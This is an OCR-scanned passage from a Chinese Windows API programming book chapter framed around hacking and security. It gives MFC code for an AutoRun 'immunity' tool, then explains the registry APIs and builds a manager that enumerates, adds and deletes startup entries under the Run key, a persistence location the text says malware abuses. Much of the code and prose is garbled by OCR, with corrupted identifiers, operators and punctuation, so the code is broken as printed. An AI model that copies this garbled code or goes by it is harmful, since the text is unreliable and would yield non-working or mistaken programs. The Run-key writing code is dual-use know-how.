SetDlgItemText (IDC_COMBO_DRIVE，" 请 选择 欲 免 疫 的 磁盘 盘 符 ") ; 


GetLogicalDriveSstrings (MAXBYTE, szDrivestr)’; 
pTmp = szDriveStr; 


While ( *pTmp ) 
{ 
mLEPDzLwe.RAddStzinog(PTImP) 
pimp += 47 
} 


以 上 函数 需要 在 OnInitDialog() 函 数 中 进行 调用 。 InitComboDrive() 函 数 中 用 到 了 SetDlgItemText() 
函数 ， 该 函数 是 MFC 中 用 于 设置 编辑 框 的 函数 ， 有 具体 使 用 方法 请 参考 MSDN。 
对 于 “免疫 ”和 “取消 免疫 ”这 两 个 按钮 ， 需 要 分 别 为 它们 添加 单 击 事件 “免疫 ”按钮 


~ 
SN 
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事件 对 应 的 代码 如 下 : 
void CImmunityUDl1g: :OnptnImmunity!() 
1 
// TODO: Add your control notification handler code here 
char szPath[IMAX PATHJ = { 0 }» 
GetDlgItemText (IDC COMBO DRIVE, szPpath, MAX PATH); 


// 创建 autorun.,inf 文件 夹 

strcat(szPath, AUTORUN); 

BOOL bRet = CreateDirectory (szPath, NULE); 
et 


: 
AfxMessageBox ("无 法 免疫 该 盘 符 ! 入 
可 能 已 经 免疫 ， 或 者 该 磁盘 为 不 可 写 状态 ! ") ; 
FEtUrn > 


} 


// 创建 无 法 删除 的 文件 夹 

strcocat (szPath, ANTI); 

bRet = CreateDirectory (szPath, NULL); 
LE pRBetny 


{ 
AfxMessageBox ("无 法 免疫 该 竹 符 ! 玉 
可 能 已 经 免疫 ,或 者 该 磁盘 为 不 可 写 状态 ! ") ; 
} 
} 


代码 中 使 用 了 两 个 宏 ， 分 别 是 AUTORUN 和 ANTI， 其 定义 如 下 : 
/7 创建 auterun.inf 文件 夹 

#define AUTORUN "autorun,.inf" 

// 创建 无 法 删除 的 文件 夹 

#define ANTI MNanti. .NY 


“取消 免疫 ”按钮 事件 对 应 的 代码 如 下 : 
void CImmunityUDlg::OnBtnCancel () 
{ 
// TODO: Add your control notification andler code here 


char szPath[MAX PATH] = { 0 }» 

/7 删除 RNmI, ， 八 目录 
GetblgrtemText (IDC, COMBO, DRIVE; szPathy, MAX PRTH) 5 
strcat (szpath, AUTORUN); 

strecat (szpath, ANTI); 

RemoveDirectory(szPath),; 


ZeroMemory (szPath, MAX PATH); 

// 删除 autorun.inf 目录 

GetDIlgItemText (IDC_COMBO DRIVE, szPath, MAX PATH); 
strcat (szPath, AUTORUN)? 

RemoveDirectory(szPath); 


} 

以 上 部 分 介绍 了 AutoRun 进行 免疫 的 代码 实例 ， 读 者 可 以 自行 运行 并 进行 测试 。 关 于 文 
件 操作 的 API 函数 部 分 就 介绍 到 此 , 通过 两 个 简单 的 实例 加 深 了 读者 对 文件 操作 API 函数 的 
使 用 。 通 过 这 两 个 实例 也 证 实 了 本 书 的 目的 ， 通 过 简单 的 学 习 ， 完 成 实用 的 工具 。 


3.2 ”注册 表 编 程 


免疫 AutoRun 的 程序 在 前 面 已 经 实现 了 ， 但 是 它 并 不 完整 。Windows 操作 系统 通过 “ 自 





中 
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动 播放 ”功能 读 取 AutoRun.inf 文件 ， 从 而 运行 AutoRun.inf 中 指定 的 程序 。 那 么 ， 如 果 能 直 
接 禁 用 系统 的 “自动 播放 ”功能 ， 岂 不 更 好 ? 

要 禁用 系统 的 “自动 播放 ”功能 ， 就 需要 修改 注册 表 。 注 册 表 是 Windows 操作 系统 中 一 
个 重要 的 数据 库 〈 也 是 有 名 的 存在 很 多 垃圾 数据 的 一 个 库 ， 要 不 怎么 会 有 那么 多 清理 注册 表 
的 工具 呢 )， 其 中 保存 着 操作 系统 和 各 种 软件 的 重要 信息 。 由 于 注册 表 的 功能 非常 强大 ,因此 
注册 表 对 于 病毒 、 木 马 来 说 是 非常 有 利用 价值 的 。 而 对 于 反 病 毒 软件 来 说 ， 注 册 表 也 是 它 需 
要 加 强 守 卫 的 地 方 。 可 以 说 ， 注 册 表 在 Windows 下 也 是 一 个 “正义 与 那 恶 ”的 必 争 之 地 。 

恶意 程序 在 注册 表 中 常见 的 操作 有 修改 文件 关联 、 增 加 系统 启动 项 、 映 像 劫持 、 自 改 浏 
览 器 主页 、 禁 用 系统 正常 功能 等 。 那 么 学 习 注 册 表 的 编程 也 就 成 了 黑客 编程 中 一 项 必需 的 基 
本 知识 。 


3.2.1 注册 表 结 构 简介 


注册 表 是 Windows 系统 管理 和 维护 的 配置 较为 复杂 的 信息 数据 库 , 它 以 树 状 形式 存储 信 
息 。 不 同 版 本 的 Windows 系统 ， 其 结构 基本 相同 。 由 于 各 种 软件 为 了 满足 自身 的 不 同 需求 ， 
对 注册 表 中 的 信息 进行 读 写 ， 导 致 注册 表 中 存在 大 量 的 元 余数 据 ， 因 此 有 人 戏称 注册 表 是 一 
个 数据 杂乱 的 “垃圾 场 ” 

查看 Windows 注册 表 的 信息 ， 可 以 使 用 Windows 提供 的 注册 表 编 辑 器 。 打 开 注册 表 编 
辑 器 的 方式 很 简单 ， 选 择 “开始 ”一 “运行 ” 在 出 现 的 “运行 ”窗口 中 输入 “regedit”， 即 
可 打开 Windows 提供 的 “注册 表 编 辑 器 ”窗口 ， 如 图 3-5 所 示 。 








REG_DWORD 

REG_DWORD 

REG_DWORD 

REG_SZ 

REG_DWORD 0x00000000 (0) 


值 类 型 


3 区 站 和 :[ 
全 ACR122CCIDInstaler 


亩 :多 Adobe 

由- 国 Advanced Card Systems Ltd, 
-a alipay 

HH- Androld SOK Tools 

田 人 | Atheros 

负 - 国 | Atheros Communications Inc， 











图 3-5 注册 表 编 辑 器 界面 
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在 图 3-5 中 ， 可 以 通过 注册 表 编 辑 器 看 出 注册 表 的 层次 结构 是 一 个 树 状 结构 。 它 由 若干 
部 分 组 成 ， 分 别 是 根 键 、 子 键 和 键 值 项 。 子 键 和 键 值 项 中 存在 的 具体 数据 有 三 部 分 ， 分 别 是 
值 名 称 、 值 类 型 和 值 。 

根 键 ， 类 似 于 磁盘 驱动 器 的 名 称 ， 在 树 状 结构 中 类 似 于 数 的 根 节点 。 从 图 3-5 中 可 以 看 
出 ， 根 键 的 父 节 点 是 “我 的 电脑 ”， 由 此 非常 类 似 于 磁盘 驱动 器 。 在 Windows 系统 下 ， 根 键 
包括 HKEY CLASSES ROOT 、HKEY CURRENT USER、HKEY LOCAL MACHINE、 
HKEY USER 和 HKEY CURRENT_CONFIG 共 5 个 。 从 Windows 9x 一 直到 Windows 8 甚至 
更 高 版 本 的 操作 系统 中 ， 根 键 都 保持 一 致 。 

子 键 : 子 键 类 似 于 文件 夹 ， 一 个 根 键 下 可 以 包含 多 个 子 键 , 子 刍 下 也 可 以 包含 多 个 子 键 。 

键 值 项 ， 不 包括 子 键 的 子 键 就 是 键 值 项 ， 相 当 于 树 状 结构 中 的 叶子 节点 。 

无 论 是 根 键 、 子 键 还 是 键 值 项 ， 都 是 注册 表 中 的 结构 ， 具 体 的 数据 就 存储 于 各 结构 的 相 
应 位 置 。 注 册 表 中 的 数据 由 3 部 分 组 成 : 值 名 称 、 值 类 型 和 值 。 在 图 3-5 中 的 右 半 部 分 可 以 
看 到 “名 称 ”“ 类 型 ”和 “数据 ”3 部分， 其 中 第 一 行 的 “名 称 ” 为 “AlReadyPin”“ 类 型 ” 
为 “REGDORD”“ 数 据 ” 为 “0x00000001(1)”。 


注 : 在 不 同 的 书 中 ,“ 根 键 "“ 子 键 "“ 键 值 项 "“ 值 名 称 "“ 值 类 型 ”和 “ 值 ”有 不 同 的 名 称 ， 只 要 根据 上 
下 文具 体 加 以 理解 即 可 。 ， 


3.2.2 注册 表 操 作 常 用 API 函数 介绍 


注册 表 的 操作 和 文件 的 操作 非常 类 似 ， 也 存在 打开 、 关 闭 、 写 入 、 查 询 等 操作 ， 也 就 是 
“ 增 、 删 、 改 、 查 ”的 功能 都 具备 ， 只 是 所 使 用 的 API 函数 都 是 以 Reg 开头 的 。 

1. 打开 和 关闭 注册 表 

操作 注册 表 需 要 通过 可 以 操作 注册 表 的 句柄 ， 与 文件 操作 类 似 。 对 注册 表 进 行 读 写 前 ， 
需要 通过 API 函数 打开 注册 表 ， 并 返回 用 于 操作 注册 表 的 句柄 ， 通 过 操作 注册 表 的 API 函数 
来 打开 返回 的 句柄 ， 然 后 对 注册 表 进 行 读 写 操 作 。 当 读 写 操作 完成 后 ， 再 通过 API 函数 将 打 
开 的 注册 表 句 柄 进行 关闭 。 

打开 注册 表 使 用 的 函数 是 RegOpenKeyEx()。 在 Win16 下 有 一 个 函数 名 为 RegOpenKey()， 
虽然 这 个 函数 在 Win32 下 仍然 可 用 , 但 是 这 是 为 了 兼容 目的 而 设置 的 , RegOpenKeyEx() 函 数 


的 定义 如 下 : 
LONG RegOpenKeyEx' 
HKEY hKey, // handle to open key 
LPCTSTR lpSubKey,; // subkey name 
DWORD ulOptions, // reserved 


REGSAM samDesired, // security access mask 
PHKEY phkResult // handle to open key 


) 

参数 说 明 如 下 。 

hKey: 指定 一 个 父 键 句 柄 。 

lpSubKey: 指向 一 个 字符 串 ， 用 来 表示 要 打开 的 子 键 名 称 。 

ulOptions: 系统 保留 ， 必 须 指定 为 0 值 。 

samDesired: 打开 注册 表 的 存 取 权 限 ， 为 了 方便 对 注册 表 的 操作 ， 通 常 使 用 KEY ALL _ 
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ACCESS 即 可 ， 有 具体 更 多 的 打开 方式 请 参考 MSDN 。 


phkResult: 指向 一 个 双子 变量 ， 用 来 接收 打开 的 子 键 句柄 。 
如 果 函 数 执行 成 功 ， 则 返回 ERROR SUCCESS， 并 且 在 phkResult 中 保存 返回 打开 子 键 


的 句柄 。 


2 注 : 所 谓 打 开 注 册 表 ， 实 质 是 打开 注册 表 的 某 一 个 子 键 ， 然 后 进行 操作 。 


当 对 注册 表 操 作 完 成 后 ， 则 需要 关闭 已 打开 的 注册 表 人 句柄 以 便 释放 资源 。 关 闭 释 放 注 册 


表 句 柄 的 函数 定义 如 下 : 
IONG RegCloseKey( 
HKEY hKey // handle to key to close 


We 
该 函数 只 有 一 个 参数 ， 是 RegOpenKeyExO 函 数 的 最 后 一 个 参数 ， 即 被 打开 的 注册 表 句 柄 。 


2. 创建 和 删除 子 键 


创建 一 个 子 键 的 API 函数 为 RegCreateKeyEx()， 其 定义 如 下 : 


LONG RegCreateKeyEx! 
HKEY' hKey, ye 
LPECTSTR lpSubKey, YU 
DWORD Reserved, Yi 
LETSTR lpClass, 4 
DWORD dwOoptions, pee 


REGSAM samDesired, We 
LPSECURITY ATTRIBUTES lpSecurityAttributes, // 
PHKEY phkResult, Vn 
LPDWORD lpdwDisposition WwW 


) 
参数 说 明 如 下 。 
hKey: 用 来 指定 父 键 句柄 。 


handle to open key 
subkey name 

reserved 

Cass Stytro 

special options 

desired security aecess 
inheritance 

key handle 

eisposition value buaffer 


lpSubKey: 指向 一 个 字符 串 ， 用 来 表示 要 创建 的 子 键 名 称 。 


Reserved: 系统 保留 ， 必 须 指定 为 0 值 。 
lpClass: 子 键 类 名 ， 一 般 设 置 为 NULL 值 。 


dwOptions: 创建 子 键 时 的 选项 ， 通 常情 况 下 使 用 REG_OPTION _ NON _ VOLATILE 宏 ， 


表示 创建 的 子 键 被 创建 到 注册 表 文 件 中 ， 而 不 是 内 存 中 。 
samDesired: 打开 注册 表 的 存 取 权 限 ， 为 了 方便 对 广 册 表 的 操作 ， 通 常 使 用 KEY ALL_ 


ACCESS 即 可 ， 具 体 方式 请 参考 MSDN。 


lpSecurityAttributes: 该 参数 指向 一 个 SECURITY_ATTRIBUTES 结构 体 ， 用 来 指定 键 句 


柄 的 安全 属性 ， 这 里 一 般 使 用 NULL。 





phkResult， 指 向 一 个 双子 变量 ， 用 来 接收 打开 的 子 键 句 柄 。 


lpdwDisposition: 一 般 设置 为 NULL 值 。 


如 果 函 数 执行 成 功 ， 则 返回 ERROR SUCCESS， 并 且 在 phkResult 中 保存 返回 创建 子 
键 的 句柄 。 当 需要 创建 的 子 键 已 经 存在 的 时 候 ， 该 函数 起 到 与 RegOpenKeyEx(O 函 数 同样 的 
作用 ， 那 么 打开 注册 表 也 可 以 使 用 RegCreateKeyEx() 函 数 进 行 代 兰 。 不 过 该 函数 的 参数 比 





RegOpenKeyEx() 函 数 的 参数 多 。 因 此 为 了 在 书写 代码 时 更 简便 , 打开 注册 表 的 操作 还 是 使 用 


RegOpenKeyEx() 函 数 较为 省 事 。 
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删除 子 键 使 用 RegDeleteKey0O 函 数 ， 其 定义 如 下 : 





第 LONG RegpeleteKeYy 
3 HKEY nhKey, // handle to open key 
LPCTSTR lpSubKey // subkey name 
宇 We 
时 该 函数 的 值 能 用 来 删除 键 值 项 , 也 就 是 函数 只 能 删除 最 下 一 层 的 子 键 。 函数 有 2 个 参数 ， 
各 | hKey 为 父 键 句柄 ，IpSubKcey 为 指向 要 副 除 的 子 键 名 称 字 符 昌 。 
写 3. 注册 表 键 值 的 查询 、 写 入 与 删除 
QQ 了 j Wy 如 2 » 
回 读 取 键 名 称 中 的 数据 或 者 查询 键 名 称 的 属性 使 用 RegQueryValueEx() 函 数 ， 其 定义 如 下 : 
a LONG RegQueryValueEx'!( 
> HKEY hKey, // handle to key 
LPCTSTR JpValueName, // valie name 
编 LPDWORD lpReserved, // reserved 
程 LPEDWORD lpType, // type buffer 

五 BBYTB lpData, // data buffer 

LPDWORD lpcbData // size of data buffer 

2 
se 参数 说 明 如 下 。 


hKey: 用 来 指定 要 读 取 的 键 值 项 所 处 的 子 键 句柄 。 

ljpValueName: 用 来 指定 要 读 取 的 键 值 项 的 名 称 。 

lpReserved: 保留 参数 ， 必 须 为 NULL 值 。 

lpType: 接收 返回 的 键 值 类 型 ， 如 果 不 需要 返回 键 值 项 类 型 ， 可 以 给 NULL 值 。 

lpData: 指向 一 个 缓冲 区 ， 用 来 接收 返回 的 键 值 数据 。 

lpcbData: 在 调用 该 函数 时 ， 这 个 参数 用 来 指定 缓冲 区 的 长 度 ， 当 函数 返回 时 ， 该 变量 
保存 缓冲 区 实际 接收 到 的 长 度 。 

写 入 键 值 项 的 函数 为 RegSetValueEx()， 其 定义 如 下 : 


LONG RegSetValueEx!( 





HKEY hKey, // handle to key 

LPCTSTR lpValudeName,, // valuel name 

DWORD Reserved, // reserved 

DWORD dwType, // value type 

CONST BYTE wipData, // valae data 

DWORD cbData // size of value data 
Wi 
参数 说 明 如 下 。 


hKey: 用 来 指定 要 写 入 的 键 值 项 所 处 的 子 键 句 柄 。 
lpValueName: 指向 定义 键 值 项 名 称 的 字符 串 。 
Reserved: 保留 参数 ， 必 须 为 0 值 。 

dwType: 指出 要 写 入 的 键 值 数据 的 类 型 。 

lpData: 指向 要 写 入 键 值 数据 的 缓冲 区 。 

cbData: 要 写 入 刍 值 数据 的 缓冲 区 长 度 。 

删除 键 值 项 的 函数 为 RegDeleteValue()， 其 定义 如 下 : 


LONG RegDeleteValue! 


HKEY hKey, // handile to key 
LPCTSTR lpValueName // value name 

} 

参数 说 明 如 下 。 





hKey: 用 来 指定 删除 的 句柄 。 
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lpValueName: 被 删除 键 值 项 的 名 称 。 
4. 子 键 和 键 值 的 枚 举 
枚 举 就 是 逐一 获取 。 子 键 的 枚 举 对 指定 键 下 面 的 子 键 进行 逐一 的 获取 。 键 值 的 枚 举 是 对 


指定 子 键 下 的 键 值 进 行 逐 一 的 获取 。 


- 


枚 举 子 键 的 函数 为 RegEnumKeyEx()， 其 定义 如 下 : 


LONG RegEnumKeyEx( 


HKEY hKey, // handle to key to enumerate 
DWORD dwIndex, // subkey index 
LPTSTR lpName, // subkey name 
LPDWORD lpcName, // size of subkey buffer 
LPDWORD lpReserved, // reserved 
LPTSTR lpClass, // class string buffer 
LPDWORD lpcClass, // size of class string buffer 
PFILETIME lpftLastWriteTime // last write time 

); 

参数 说 明 如 下 。 


hKey: 指定 被 枚 举 的 键 句柄 。 

dwIndex: 指定 需要 返回 信息 的 子 键 索引 编号 。 

lpName: 用 户 接收 返回 子 键 名 称 的 缓冲 区 。 

IlpcName: 在 调用 该 函数 前 ， 该 参数 保存 IpName 指向 缓冲 区 的 长 度 ; 在 该 函数 调用 完成 
该 参数 保存 缓冲 区 实际 接收 到 的 数据 的 长 度 。 

lpReserved: 保留 参数 ， 必 须 为 NULL 值 。 

lpClass: 一 般 为 NULL 值 。 

lpcClass: 一 般 为 NULL 值 。 

lpftLastWriteTime: 指向 一 个 FILETIME 结构 体 ， 用 于 接收 最 后 一 次 被 写 入 的 时 间 。 

枚 举 键 值 的 函数 为 RegEnumValue()， 其 定义 如 下 : 


LONG RegEnumValuel 
HKEY hKey, // handle to key to query 
DWORD dwindex; // index of value to query 
LPTSTR lpValueName, // value buffer 
LPDWORD lpcValueName, // size of value buffer 


LPDWORD lpReserved, // reserved 
LPDWORD lpType, // type buffer 
LPBYTE lpData, // data buffer 
LPDWORD lpcbData // size of data buffer 
); 
参数 说 明 如 下 。 


hKey: 指定 被 枚 举 的 键 句 柄 。 

dwIndex: 指定 需要 返回 信息 的 键 值 索引 编号 。 

lpValueName: 用 户 接收 返回 键 值 名 称 的 缓冲 区 。 

lpcValueName: 在 调用 该 函数 前 ， 该 参数 保存 jpValueName 指向 缓冲 区 的 长 度 ; 在 该 函 


数 调用 完成 后 ， 该 参数 保存 缓冲 区 实际 接收 到 的 数据 的 长 度 。 


lpReserved: 保留 参数 ， 必 须 为 NULL 值 。 

lpType: 指向 一 个 用 于 返回 键 值 数据 类 型 的 双 字 变量 。 

lpData: 用 户 接收 返回 键 值 数据 的 缓冲 区 。 

lpcbData: 在 调用 该 函数 前 ， 该 参数 保存 lpData 指向 缓冲 区 的 长 度 ; 在 该 函数 调用 完成 
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后 ， 该 参数 保存 缓冲 区 实际 收 到 的 数据 的 长 度 。 
与 注册 表 操 作 相 关 的 函数 就 介绍 到 这 里 。 以 上 是 注册 表 操 作 的 常用 函数 ， 这 里 无 法 将 注 
册 表 操作 相关 的 函数 一 一 介绍 ， 其 他 相关 函数 在 具体 使 用 时 请 参考 MSDN 进行 学 习 。 


3.2.3 注册 表 下 启动 项 的 管理 


对 于 Windows 操作 系统 来 说 ， 注 册 表 中 保存 了 非常 多 的 系统 配置 ， 例 如 常见 的 下 主页 
保存 在 HKREY LOCAL MACHINE\Software\Mircosoft\Internet ExplorerMain 下 的 Start Page 
中 ; 再 比如 禁止 磁盘 驱动 器 自动 运行 的 AutoRun 功能 在 注册 表 的 HKEY CURRENT 
USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 下 的 NoDriveTypeAut- oRun 
中 进行 设置 ， 还 有 映像 动 持 、 文 件 关 联 等 很 多 系统 配置 ， 都 可 以 在 注册 表 中 直接 进行 配置 。 

有 很 多 常见 的 安全 工具 都 需要 对 注册 表 进行 操作 ， 这 里 介绍 通过 注册 表 获 得 随 Windows 
系统 启动 时 的 启动 项 。 在 注册 表 的 启动 项 中 ， 除 了 正常 的 系统 工具 、 软 件 工具 外 ， 病 毒 和 木 
马 也 会 利用 注册 表 的 启动 项 悄然 地 让 自己 跟随 Windows 的 启动 而 启动 , 从 而 实现 自 启动 的 功 
能 。 下 面 通 过 编写 一 个 枚 举 注册 表 启动 项 的 工具 ， 进 一 步 学 习 注 册 表 操作 时 使 用 API 函数 的 
相关 流程 ， 从 而 将 前 面 的 知识 得 到 实际 的 应 用 。 

1. 程序 的 界面 及 相关 代码 

注册 表 中 可 以 用 来 完成 开机 启动 的 地 方 非常 
多 ， 这 里 不 会 一 一 介绍 。 对 注册 表 具 体 键 值 的 介 
绍 并 非 本 书 的 重点 ， 这 里 只 介绍 注册 表 中 众多 可 
以 完成 开机 启动 的 其 中 一 个 位 置 ， 至 于 其 他 地 方 ， 
读者 可 以 自行 搜集 并 完成 。 这 里 的 程序 依然 使 用 
对 话 框 的 形式 ， 其 界面 如 图 3-6 所 示 。 

这 个 界面 就 是 笔者 已 经 编写 好 的 软件 的 界 
面 。 这 个 界面 中 用 到 了 CListCtrl 控件 ， 用户 对 其 
进行 添加 并 进行 相应 的 设置 即 可 。 在 实例 的 介绍 
中 ， 笔 者 会 尽 可 能 少 地 提 及 控件 属性 的 设置 。 因 
为 这 并 非 本 书 应 该 提 到 的 内 容 ， 读 者 可 以 自行 参 人 
考 MFC 开发 相关 的 书籍 。 这 里 给 出 一 个 关于 CListCtrl 初始 化 的 代码 ， 有 具体 如 下 : 


VOID CManageRunDlg: ;InitRunList() 


{ 
/7 设置 扩展 样式 
m RunList.SetExtendedstyle( 
m RunList.GetExtendedSstyle!() 
| LVS_EX GRIDLINES /1 有 网 格 
| LVS_ EX_FULLROWSELECT); // 选择 单行 





// 在 Listctrl 中 搬入 新 列 

m RunList,.InsertColumn(0, "NO.")? 

m RunList,InsertColumn(1，" 键 值 名 称 ") ; 
m RunList,InsertColumn(2, "和 键 值 几 元 


/* 

LVSCW_AUTOSIZE USEHEADER: 

列 的 宽度 自动 匹配 为 标题 文本 

如 果 这 个 值 用 在 最 后 一 列 ， 列 宽 被 设置 为 Listctrl 剩余 的 长 度 
sh 








3.2 注册 表 编 程 





mm_RunIiaSst SetColumnWidth (0, LVYSCW_ AUTOSIZE USEHEADER)':; 

m RunList.SetColumnWidth (1, LVSCW AUTOSTZE USEHEADER); 

m RunList,.SetcolumnWidth(2, LVSCW AUTOSIZE USEHEADER); 
} 


2， 启 动 项 的 枚 举 

这 个 实例 主要 是 通过 枚 举 注册 表 中 的 “HKEY_LOCAL _MACHINE\Software\Microso 
代 Windows\CurrentVersion\Run” 子 键 下 的 刍 值 项 ， 取 得 跟随 Windows 启动 而 启动 的 程序 。 在 
运行 软件 “注册 表 启 动 项 管理 ”后 ， 应 该 将 上 述 注 册 表 子 键 位 置 下 的 所 有 启动 项 的 内 容 显 示 
出 来 ， 其 代码 如 下 : 

#define REG RUN "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" 


VOID CManageRunD1lg':: ShowRunList!() 


{ 
// 清空 Listctrl 中 的 所 有 项 
m RunList.DeleteAllIitems (); 


DWORD dwTiype = 07 

DWORD dwBufferSize = MAXBYTE; 
DWORD dwKeySize = MAXBYTE; 

char szValueName [MAXBYTE] = { 0 }; 
char szValueKey [MAXBYTE] = { 0 }; 


HKEY hKey NOLLS; 
LONG 1lRet RegOpenKeyEx (HKEY LOCAL MACHINE, 
REG _ RUN, 0, KEY ALL. ACCESS, thKey); 


| | 


If (0 Ret ls BRRORLSUCCOESS ) 
{ 

rethurn ; 
} 


Lt 0 
CString strTmp; 


while { TRUE ) 


{ 
// 枚 举 键 项 


lRet = RegEnumValue(hKey, i, szValueName, 
SdwBufferSsize; NULL; &dwType, 
(unsigned char *)szValueKey, &dwKeySize); 


// 没有 则 退出 循环 
if ( 1lRet == ERROR NO MORE ITEMS ) 
{ 
break; 
} 


// 显示 到 列表 控件 中 

strTmp.Format ("%d", i); 

m RunList.InsertIitem(i, strTmp)’;» 

m RunList.SetIitemText (i, 1, szValueName); 
m RunList.SetIitemText (i, 2, szValueKey); 


ZeroMemory (szValideKey, MAXBYTE); 
ZeroMemory (szValueName, MAXBYTE); 


dwBufferSize = MAXBYTE; 
dwKeySsize = MAXBYTE; 


计 


} 


RegCloseKey (HKeYy) 7 





山 巴 商 


沿革 ldV SMOPUIM 喘 酒 


| 





第 3 章 黑客 Windows API 编程 








当 将 注册 表 中 的 自 启动 项 显示 出 来 后 ， 必 然 会 对 其 进行 一 定 的 操作 或 处 理 。 对 于 注册 表 


pe 启动 项 的 管理 来 说 ， 常 见 的 有 3 个 功能 ， 首 先是 屏蔽 启动 项 ， 然 后 是 删除 启动 项 ， 最 后 是 添 
章 | 加 启动 项 (这 三 者 是 并 列 关系 , 不 是 先后 顺序 )。 这 里 的 程序 中 只 完成 后 两 个 功能 ， 即 删除 启 
黑 动 项 和 添加 启动 项 。 删 除 启动 项 和 屏蔽 启动 项 是 有 差别 的 ， 其 差别 在 于 屏蔽 启动 项 是 可 恢复 
客 | 的 ， 而 删除 启动 项 是 不 可 恢复 的 ， 至 于 屏蔽 启动 项 这 个 功能 就 留 给 读者 实现 了 。 很 多 系统 优 
全 化 工具 和 系统 安全 工具 中 都 有 此 功能 ， 读 者 请 参考 优化 工具 的 实现 原理 自行 编写 代码 完成 。 
人 3. 添加 启动 项 的 代码 
2 只 要 将 需要 跟随 Windows 启动 的 软件 添加 至 “HKEY LOCAL MACHINE\Software\Micro 
卫 soft\Windows\CurrentVersionN\Run” 子 键 下 ， 就 可 以 实现 所 需 的 功能 ， 代 码 如 下 : 
编 void CManageRunDlg: :OnBtnAdd() 
程 | // TODO: Add your control notification handler code here 

CRegAdd Regadd; 

RegAdd. DoModal (); 

RR 


// 判断 输入 是 否 完整 
if ( strlen(RegAdd.m szKeyName) > 0 && 
strlen(RegAdd.m szKeyValue) > 0) 
{ 
HKEY PhKey = NULL; 
EONG lRet = RegOpenKeyEx (HKEY LOCAL MACHINE, 
REG RUN, 0, KEY ALL ACCESS, ghKey); 


E10 LRetl 1= ERROR SUCCRSS') 
ET 


} 


RegSetValueEx (hKey, RegAdd.m szKeyName, 0, 
REG._ SZ2, (const unsigned char*)RegAdd.m szKeyValue, 
strlen(RegAdd.m szKeyValue) + sizeof (char))’; 


RegCloseKey (hKey); 


ShowRunList(); 
} 
else 
{ 
AfxMessageBox ("请 输入 完整 的 内 容 ") ; 
} 
} 


在 代码 中 ，CRegAdd 对 应 着 添加 启动 项 的 窗口 ， 该 窗口 的 代码 如 下 : 
void CRegAdd: ;OnBtnOk () 
{ 
// TODO: Add your control notification handler code here 
ZeroMemory (m_ szKeyName, MAXBYTE); 
ZeroMemory (m szKeyValue, MAX PATH); 


GetDlgItemText (IDC EDIT KEYNAME, m szKeyName, MAXBYTE); 
GetDlgItemText (IDC EDIT KEYVALUE, m szKeyValue, MAX PATH); 


EndDialog (0); 
} 


4. 删除 启动 项 的 代码 
删除 启动 项 的 实现 代码 比 添加 启动 项 的 代码 要 简单 ， 但 是 在 删除 的 时 候 涉 及 一 个 关于 
CListCtrl 控件 的 编程 ， 也 就 是 选中 列表 框 中 的 哪个 启动 项 要 进行 删除 。 这 是 一 个 对 控件 进行 





中 





3.3 ”服务 相关 的 编程 





编程 的 问题 ， 在 代码 中 获取 选中 的 启动 项 后 ， 要 进行 删除 就 非常 简单 了 ， 代 码 如 下 : 
void CManageRunDlg: :OnBtnDel () 
{ 
// TODO: Add your control rnotification handler code here 
POSITION pos = m RunList.GetFirstSelecteditemPosition(); 
int nSelected = 一 17 
while { pos ) 
{ 


nSelected = m RunList.GetNextSelectedItem(pos); 
} 
if ( =1 == nSelected ) 
{ 

AfxMessageBox ("请 选择 要 删除 的 启动 项 ") ; 

return 7 


} 


char szKeyName [MAXBYTE] = { 0 }; 
m_ RunList. Ee 1, szKeyName, MAXBYTE); 


HKEY hkey = NULL; 


LONG lRet = RegOpenKeyEx (HKEY LOCAL, MACHINE, 
REG. RUN, 0; KEY ALL ACCESS, &hKey)’; 


RegDeleteValue (hKkey, szKeyName); 
RegCloseKey (Key) 7 


ShowRunList(); 


} 

对 于 注册 表 启 动 项 的 管理 软件 就 编写 到 这 里 ， 读 者 可 以 将 其 他 的 可 以 让 软件 开机 启动 的 
注册 表 子 键 添 加 到 软件 中 去 ， 这 样 启动 项 管理 软件 就 更 加 强大 、 更 加 完美 了 。 但 是 ， 当 不 断 
深入 对 注册 表 的 了 解 时 ， 会 发 现 更 多 的 可 以 让 软件 随机 启动 的 子 键 ， 这 样 就 需要 每 次 将 新 发 
现 的 子 键 添加 到 代码 中 ， 而 每 次 改动 代码 是 非常 繁琐 的 。 那 么 ， 有 没有 什么 好 的 方法 可 以 在 
每 次 添加 子 键 的 同时 不 改变 代码 本 身 呢 ? 结合 前 面 介绍 的 文件 操作 知识 ， 可 以 把 要 枚 举 的 注 
册 表 子 键 保存 到 一 个 文件 中 ， 然 后 让 程序 去 该 文件 中 读 取 这 些 子 键 ， 最 后 通过 API 函数 对 注 
册 表 进行 枚 举 。 这 样 ， 以 后 每 当 在 注册 表 中 有 新 的 需要 枚 举 的 内 容 时 ， 只 需要 修改 保存 注册 
表 子 键 的 文件 即 可 ， 而 不 需要 对 程序 本 身 进 行 修改 了 。 


3.3 ”服务 相关 的 编程 


几乎 每 一 种 操作 系统 都 有 一 种 在 系统 启动 时 启动 的 进程 机 制 ， 这 种 机 制 不 会 依赖 于 用 户 
的 交互 。 在 Windows 下 ， 类 似 的 机 制 被 称 为 服务 或 Windows 服务 。 服 务 是 一 种 程序 类 型 ， 
它 在 后 台 运 行 ， 服 务 程序 通常 可 以 在 本 地 和 通过 网 络 为 用 户 提供 一 些 功能 ， 服 务 在 操作 系统 
启动 时 就 会 随 之 启动 的 程序 。 服 务 程序 可 能 是 EXE 程序 ， 具 有 其 单独 的 进程 ， 也 有 可 能 是 
DLL 文件 依附 于 某 个 进程 (比如 svchost.exe), 更 有 可 能 是 SYS 文件 而 处 于 系统 的 内 核 之 中 。 
由 于 服务 所 处 的 核心 地 位 、 启 动 方式 等 因素 ， 它 也 是 反 病 毒 软件 与 恶意 软件 的 “兵家 必 争 之 
地 ”。 对 于 研究 系统 安全 来 说 则 非常 重要 。 
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本 节 并 不 讨论 如 何 编写 一 个 系统 服务 ， 而 是 编写 一 个 用 来 显示 出 系统 已 经 安装 的 所 有 服务 。 
3.3.1 如 何 查看 系统 服务 


在 Windows 下 ， 有 很 多 服务 是 跟随 操作 系统 一 起 启动 的 ， 有 具体 有 哪些 服务 是 跟随 操作 系 
统一 起 启动 的 呢 ? 如 何 查看 呢 ? 其 实 非常 简单 。 在 “我 的 电脑 ”上 单 击 鼠 标 右键 ， 然 后 在 弹出 
的 菜单 上 选择 “管理 ”， 打开“ 计算 机 管理 ”工具 ， 单 击 左面 树 形 列表 的 “服务 和 应 用 程序 ”会 
